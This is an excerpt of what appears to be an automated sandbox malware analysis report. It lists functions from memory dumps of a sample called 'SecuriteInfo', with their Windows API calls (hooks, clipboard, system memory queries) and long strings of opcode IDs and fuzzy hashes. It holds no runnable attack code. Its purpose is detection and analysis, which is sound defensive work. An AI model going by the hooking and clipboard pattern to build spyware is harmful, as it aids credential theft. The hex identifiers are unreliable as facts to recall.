                                                              • Opcode ID: 7f590ea682945b4d32d43a9f9fa3a4a4dc35e332b3b431b9e8034a90bb1258ff
                                                              • Instruction ID: a459abdbab4bfad47119c15e8648ca1d11d588fb0294ba9523ba1f3d7a9627e7
                                                              • Opcode Fuzzy Hash: 7f590ea682945b4d32d43a9f9fa3a4a4dc35e332b3b431b9e8034a90bb1258ff
                                                              • Instruction Fuzzy Hash: 9C41C0B1D10309DFDB14CF9AC884ADEBFB5BF48310F24812AE819AB250D775A985CF90
                                                              Function 054354A4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 05438CF1
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3599998262.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5430000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CallProcWindow
                                                              • String ID:
                                                              • API String ID: 2714655100-0
                                                              • Opcode ID: f2df869c7633e9ef59dab8d0a0eac08669c1cfd86004ae7d981a064e6161050f
                                                              • Instruction ID: e2bc96972115593da5c4633c4a6a980feeef3994496d6346e012fc4de7bf7d6d
                                                              • Opcode Fuzzy Hash: f2df869c7633e9ef59dab8d0a0eac08669c1cfd86004ae7d981a064e6161050f
                                                              • Instruction Fuzzy Hash: C5412AB4901209CFCB14DF99C449AAAFBF5FF88314F24C85AE519A7321D774A841CBA0
                                                              Function 05431028 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(00000037,00000000,00000000,03E560D8,02E77C30,?,00000000,?,00000000,00000000), ref: 054310E7
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3599998262.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5430000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              • Opcode ID: 1d790ba73051770ba7cc1b0015d5db2847ef6d9fa199e8c5f1be5e3613448253
                                                              • Instruction ID: 863a01670d55927764cfe179a08151187062b53b9e88d8a1d42b765bec7300c7
                                                              • Opcode Fuzzy Hash: 1d790ba73051770ba7cc1b0015d5db2847ef6d9fa199e8c5f1be5e3613448253
                                                              • Instruction Fuzzy Hash: 19215B303046119FD718EB29D859B6F77BAFB88614F14826AE00ACB7A0CB71EC42C794
                                                              Function 0545074C Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3600073839.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5450000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Clipboard
                                                              • String ID:
                                                              • API String ID: 220874293-0
                                                              • Opcode ID: 70032dc48f83e4e902471c1ef78f941519ba01177b69ac64fd1767dc555b71bd
                                                              • Instruction ID: 9daebd9229acad194bfc991dffc28a5ed2d5f1accb95b924ea59bb495482a1f0
                                                              • Opcode Fuzzy Hash: 70032dc48f83e4e902471c1ef78f941519ba01177b69ac64fd1767dc555b71bd
                                                              • Instruction Fuzzy Hash: B83122B0D01208DFDB20DFA9C984BCEBBF5BF48314F24805AE408AB391D7746945CBA5
                                                              Function 0545170C Relevance: 1.6, APIs: 1, Instructions: 72comclipboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3600073839.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5450000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Clipboard
                                                              • String ID:
                                                              • API String ID: 220874293-0
                                                              • Opcode ID: 2feedaee4baeaba6214b573cc711add381ec9a7e58e2fa568c61afceb0c35f34
                                                              • Instruction ID: ae78c7a1f8cb86cb8e661513740bd4a621492be4f35b81ac3a00c3007ac0281c
                                                              • Opcode Fuzzy Hash: 2feedaee4baeaba6214b573cc711add381ec9a7e58e2fa568c61afceb0c35f34
                                                              • Instruction Fuzzy Hash: D8311EB0D01248DFDB20DFA9C984BDEBBF1AF48314F24805AE404BB395D7745945CB65
                                                              Function 0545C960 Relevance: 1.6, APIs: 1, Instructions: 70windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostMessageW.USER32(?,?,?,?), ref: 0545C9E5
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3600073839.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5450000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: 1374cefb38fca6650f50faa375946d21a3a0cde32554a67cbd20ec1998e1decd
                                                              • Instruction ID: a8b00cb0512b79e40f86b1a6106d77d092a8a99c32b690099b82b1d955329438
                                                              • Opcode Fuzzy Hash: 1374cefb38fca6650f50faa375946d21a3a0cde32554a67cbd20ec1998e1decd
                                                              • Instruction Fuzzy Hash: A821A4B58083858FCB11CF99C885BEEBFF4EF4A210F14449AD494E7253C3789945CBA5
                                                              Function 011D7689 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 011D7717
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3596553953.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_11d0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: c9251f5bfe965c1bec329a20a8e723475edcec0fd85d96dfdc0bfd7043792f2f
                                                              • Instruction ID: 060534b557c856aeabd4e0e4af19d632fa8fffd30d3a0e55c3c4945fce8f9292
                                                              • Opcode Fuzzy Hash: c9251f5bfe965c1bec329a20a8e723475edcec0fd85d96dfdc0bfd7043792f2f
                                                              • Instruction Fuzzy Hash: FA21E6B5D002489FDB10CFAAD584ADEBFF5FB48310F14841AE918A3350D378A954CFA5
                                                              Function 011D7690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 011D7717
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3596553953.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_11d0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: e3f464f0e7449087441c00004c8e5adab1f535ced04ae63e00158749b803f62e
                                                              • Instruction ID: 77e7694e367defb77ea02e582e9825e04c36474ec922d15438a1863180761863
                                                              • Opcode Fuzzy Hash: e3f464f0e7449087441c00004c8e5adab1f535ced04ae63e00158749b803f62e
                                                              • Instruction Fuzzy Hash: A721C2B59002499FDB10CFAAD984ADEBFF9FB48314F14841AE918A3350D378A954CFA5
                                                              Function 011D2A02 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 011D2A83
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3596553953.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_11d0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: HookWindows
                                                              • String ID:
                                                              • API String ID: 2559412058-0
                                                              • Opcode ID: 68fcc5ed9d0a5279cf7098351827a586058a6c49b1ef78dba60f3fbea87c1e0b
                                                              • Instruction ID: 73bb435c107eab651b119784b7876bbb82b7e201213ca053a60ae120a4107db1
                                                              • Opcode Fuzzy Hash: 68fcc5ed9d0a5279cf7098351827a586058a6c49b1ef78dba60f3fbea87c1e0b
                                                              • Instruction Fuzzy Hash: 762125B5D002498FCB24DFAAC944BEEBBF5EF88310F108419D429A7250C778A945CFA1
                                                              Function 011D2A08 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 011D2A83
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3596553953.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_11d0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: HookWindows
                                                              • String ID:
                                                              • API String ID: 2559412058-0
                                                              • Opcode ID: 8dc00cc17916e51878c739d69405aa8aaf783ed38faa93ebc3c9ada15bb1a2f3
                                                              • Instruction ID: 2889793b035cc39e7b131811080b1ebbbfe987b66db2f5173f4e6b58d1631014
                                                              • Opcode Fuzzy Hash: 8dc00cc17916e51878c739d69405aa8aaf783ed38faa93ebc3c9ada15bb1a2f3
                                                              • Instruction Fuzzy Hash: 7321E5B59002099FDB24DF9AC944BEEFBF5FF88310F108419E529A7250C779A945CFA1
                                                              Function 05457EE4 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,05459402,?,?,?,?,?), ref: 054594A7
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3600073839.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5450000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CreateFromIconResource
                                                              • String ID:
                                                              • API String ID: 3668623891-0
                                                              • Opcode ID: 9b7de9ebe446a034f6bd5df09cb639544f043463ea49ae41695204ee24158040
                                                              • Instruction ID: 8febb0a6200628dbe70123be0a54336ce29eefad990366f7d5af6aa100675545
                                                              • Opcode Fuzzy Hash: 9b7de9ebe446a034f6bd5df09cb639544f043463ea49ae41695204ee24158040
                                                              • Instruction Fuzzy Hash: 4A116AB1804349DFCB10DF9AC844BDEBFF9EB48320F14845AE914A3210C339A950DFA5
                                                              Function 06781440 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,06781FA2), ref: 0678208F
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3600796785.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6780000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: GlobalMemoryStatus
                                                              • String ID:
                                                              • API String ID: 1890195054-0
                                                              • Opcode ID: e04006ed85b4400782180b22341286820657ecd069caee8faa0d3c06330b2a81
                                                              • Instruction ID: 6c2a20e27d18b62e16b182612d82568ff25f68096b2fea40de93ba713265fee2
                                                              • Opcode Fuzzy Hash: e04006ed85b4400782180b22341286820657ecd069caee8faa0d3c06330b2a81
                                                              • Instruction Fuzzy Hash: 821103B1C106599FCB10DF9AC544AAEFBF4EF49310F11816AE818B7241D378AA44CFE5
                                                              Function 06782020 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,06781FA2), ref: 0678208F
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3600796785.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6780000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: GlobalMemoryStatus
                                                              • String ID:
                                                              • API String ID: 1890195054-0
                                                              • Opcode ID: 33f2e4d76000e3a9d558d922f3dd03ad5d0adaa27f6e09b892c420229b981852
                                                              • Instruction ID: 7da155e45e95cdc4edd74eabc697b09363671e40722782aa8fa4a07d19d425f6
                                                              • Opcode Fuzzy Hash: 33f2e4d76000e3a9d558d922f3dd03ad5d0adaa27f6e09b892c420229b981852
                                                              • Instruction Fuzzy Hash: C711D3B1C106599FCB10DF9AC54479EFBF4BF08320F14866AD828B7291D778AA44CFA5
                                                              Function 05430633 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0543069E
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3599998262.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5430000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 2d0259083dd40c9a40142c1364482080740307cca1a560dfd631bd5796df45e9
                                                              • Instruction ID: c196058e5f6d9a45d08cc7e0b4af8f99a3b7645173c8181b2aa977e146248222
                                                              • Opcode Fuzzy Hash: 2d0259083dd40c9a40142c1364482080740307cca1a560dfd631bd5796df45e9
                                                              • Instruction Fuzzy Hash: 541102B5C007498FDB10DF9AC444ADEFBF4EB88320F14856AD819A7614C379A545CFA5
                                                              Function 0545C988 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostMessageW.USER32(?,?,?,?), ref: 0545C9E5
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3600073839.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5450000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: 0826ea5a39eb3db6f60247654bed91a56afb5b6b080480151cb9949f8aa50839
                                                              • Instruction ID: 432bb6106ee63422b10cc7a0305e8843f2c7830a062b2422dc235cef63bd34f8
                                                              • Opcode Fuzzy Hash: 0826ea5a39eb3db6f60247654bed91a56afb5b6b080480151cb9949f8aa50839
                                                              • Instruction Fuzzy Hash: 6F11F8B58003499FDB10DF9AC985BDEBBF8EB48320F10845AE558A3641D378A944CFA5
                                                              Function 05430638 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0543069E
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3599998262.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5430000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: ae106edd6228e9a789f089cee383faa87dd0a943a5a058071574ec33c25dae34
                                                              • Instruction ID: 17851307b299e73ae551cc40eae1750d6b17c5633315b83dd53efd38f2479811
                                                              • Opcode Fuzzy Hash: ae106edd6228e9a789f089cee383faa87dd0a943a5a058071574ec33c25dae34
                                                              • Instruction Fuzzy Hash: A51110B5C007498FDB20DF9AC448ADEFBF4EF88320F10856AD819A7614C379A545CFA5
                                                              Function 05435368 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 0543593D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3599998262.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5430000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: LongWindow
                                                              • String ID:
                                                              • API String ID: 1378638983-0
                                                              • Opcode ID: 8e062ee54b2636f5b51f04ed47292fa863bcf74f2bf1cbc733e8663bd7ce3789
                                                              • Instruction ID: d1d1dae7ca8f8174a3193b2f996ec69191a8c86da76c08a362bd29f56092e051
                                                              • Opcode Fuzzy Hash: 8e062ee54b2636f5b51f04ed47292fa863bcf74f2bf1cbc733e8663bd7ce3789
                                                              • Instruction Fuzzy Hash: 501136B5800208CFCB10DF8AC485BDFBBF8EB48320F20841AE919A3310D378A940CFA5
                                                              Function 05457F28 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,?,?,?), ref: 0545980D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3600073839.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5450000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 7d1b282824be2e45448391b7a8e34175782a56b95df8848a32ae531750c9280d
                                                              • Instruction ID: 6c36acb45082084ed227908f2d55e59a395eaa3edeb5bbf888a24e95e206e506
                                                              • Opcode Fuzzy Hash: 7d1b282824be2e45448391b7a8e34175782a56b95df8848a32ae531750c9280d
                                                              • Instruction Fuzzy Hash: 5711F5B5800348DFCB10DF9AC484BDEBBF8FB48320F20845AE918A7201D375A944CFA5
                                                              Function 0543AA10 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 0543C70D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3599998262.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5430000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Initialize
                                                              • String ID:
                                                              • API String ID: 2538663250-0
                                                              • Opcode ID: 6f66026328153ee9cb058f1d83ea37e32b205fca8e101efce2461e93387bfc94
                                                              • Instruction ID: 8ca59328e08f6f8b94460abbbe62a725f224b6ecf45d3f8a7ee124505e0a0b9d
                                                              • Opcode Fuzzy Hash: 6f66026328153ee9cb058f1d83ea37e32b205fca8e101efce2461e93387bfc94
                                                              • Instruction Fuzzy Hash: 471103B58042498FCB20DF9AD585BDEBBF8EB48310F20845AD519B7310D378A944CFA5
                                                              Function 06780AC0 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3600796785.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6780000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: DispatchMessage
                                                              • String ID:
                                                              • API String ID: 2061451462-0
                                                              • Opcode ID: 6225e8f33cc384155676cd17c194c5524582b30109cb7092a99d63a3f9dee9f7
                                                              • Instruction ID: a58c096474eb32b6639394a0d2c8d6ad3f7eba4dffcec0be0b0046eb4596d5bb
                                                              • Opcode Fuzzy Hash: 6225e8f33cc384155676cd17c194c5524582b30109cb7092a99d63a3f9dee9f7
                                                              • Instruction Fuzzy Hash: 7611F2B5C04689CECB10DF9AD984ADEFBF5AB48314F20841AD418B3640D338A544CFA5
                                                              Function 054358D8 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 0543593D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3599998262.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5430000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: LongWindow
                                                              • String ID:
                                                              • API String ID: 1378638983-0
                                                              • Opcode ID: bff8709c1a19d11aaf83686970cd3fc4bfda6e082da66d444414430ec112474f
                                                              • Instruction ID: 038aa60e20bb0b91ddc81552ccc94caf8550e1eba7a1c47e0389d01411989b72
                                                              • Opcode Fuzzy Hash: bff8709c1a19d11aaf83686970cd3fc4bfda6e082da66d444414430ec112474f
                                                              • Instruction Fuzzy Hash: 281122B58002498FDB10DF99C585BDEBBF8FB48320F20844AD959A3310C379A940CFA5
                                                              Function 06780AC8 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3600796785.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6780000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: DispatchMessage
                                                              • String ID:
                                                              • API String ID: 2061451462-0
                                                              • Opcode ID: d60c277c0c7d03e2b310030ed18881f8f498c18dcec68792079d9a375180ba98
                                                              • Instruction ID: cc7d8f0febb0680f6dc443a38a2154eb55c0c48f63befb88c9bd4303f75faaaf
                                                              • Opcode Fuzzy Hash: d60c277c0c7d03e2b310030ed18881f8f498c18dcec68792079d9a375180ba98
                                                              • Instruction Fuzzy Hash: 7311D0B5C04649CFCB10DF9AD944BDEFBF4EB48314F20842AD518A3650D378A544CFA5
                                                              Function 0543C6B0 Relevance: 1.5, APIs: 1, Instructions: 42comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 0543C70D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3599998262.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_5430000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Initialize
                                                              • String ID:
                                                              • API String ID: 2538663250-0
                                                              • Opcode ID: 9c01e771ff3831fa7d1403ac7ae01a63d025a294026aecfcb77099095958a6c4
                                                              • Instruction ID: afc49e99d00339da620e2dcaca3d6495f86a825ee5e81570cbdaa3cce01d6512
                                                              • Opcode Fuzzy Hash: 9c01e771ff3831fa7d1403ac7ae01a63d025a294026aecfcb77099095958a6c4
                                                              • Instruction Fuzzy Hash: 031103B58002498FCB10DF9AD585BDEBBF4AB48224F20845AD918A3210D339A944CFA5
                                                              Function 0117D500 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3596271309.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_117d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 95afdf89b02ab06d18bfd7013002c7bad56215bf5003542664c5a37a71a08d57
                                                              • Instruction ID: b32fab9138384d2772e69c01cf1827ef03b2953a5f7d1b5290626ced3d9a7d8d
                                                              • Opcode Fuzzy Hash: 95afdf89b02ab06d18bfd7013002c7bad56215bf5003542664c5a37a71a08d57
                                                              • Instruction Fuzzy Hash: 7A21F171504208DFDF1ADF58E9C0B26BF75FF88318F208569E90A0A356C33AD456CBA2
                                                              Function 0118D0FC Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3596330214.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_118d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 25bb26f148ca1c19dd7b5a8b6bc91b9a1597f49e79f9ad037d6d5b2d45168c24
                                                              • Instruction ID: 08de5577513e45ef0d9c62be8730083085daffced095c4948f0fe52e3857b329
                                                              • Opcode Fuzzy Hash: 25bb26f148ca1c19dd7b5a8b6bc91b9a1597f49e79f9ad037d6d5b2d45168c24
                                                              • Instruction Fuzzy Hash: 2B21F271504304AFDF09EFA8E9C0B26BBA5FF88314F20C56DD9094B296C33AD446CB62
                                                              Function 0118D2B4 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3596330214.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_118d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b30c2da3572e20295120e80825e9557dcfae03a54189b828099f10c7855c762d
                                                              • Instruction ID: 716566633d9ce33c6ae38ee77e9c92b5e233086b7dd5af5e164498dd497043e7
                                                              • Opcode Fuzzy Hash: b30c2da3572e20295120e80825e9557dcfae03a54189b828099f10c7855c762d
                                                              • Instruction Fuzzy Hash: 8221F5B55083049FDF09EF98E5C0B26BB65FB84314F24C56DED494B292C33AD806CE62
                                                              Function 0117D4FB Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3596271309.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_117d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction ID: cdc21290d084d3e281cce386e176b4decc4481b3f526b32a4a41181271577e39
                                                              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction Fuzzy Hash: B4119D76504284CFDF16CF54D5C4B16BF71FB84314F2486A9D9490A256C336D45ACBA2
                                                              Function 0118D2AF Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3596330214.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_118d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction ID: 2634b22584ce87cc9a97b1f7b16d453ada2759ed41cfad550839b3e2b7134920
                                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction Fuzzy Hash: D311BBB5508780DFDB06DF54E5C4B15BFA1FB84214F28C6A9DC494B692C33AD40ACFA2
                                                              Function 0118D0F7 Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3596330214.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_118d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction ID: 67eb333bd69bc9e465bb23e5f83bf0ba4f102c13de168c6d2ff9e02645be2fd7
                                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction Fuzzy Hash: FB11BB75504380DFDB0ADF54E9C4B15BFA1FB84214F24C6A9D8494B296C33AD44ACF62